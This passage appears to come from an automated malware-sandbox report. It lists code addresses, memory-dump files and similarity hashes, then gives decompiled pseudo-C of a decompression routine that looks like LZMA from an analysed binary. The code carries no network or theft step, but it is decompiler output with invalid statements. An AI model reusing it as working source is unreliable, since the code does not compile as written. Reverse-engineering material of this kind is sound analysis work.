                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406843
                0x00406840
                0x00000000
                0x00406595

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
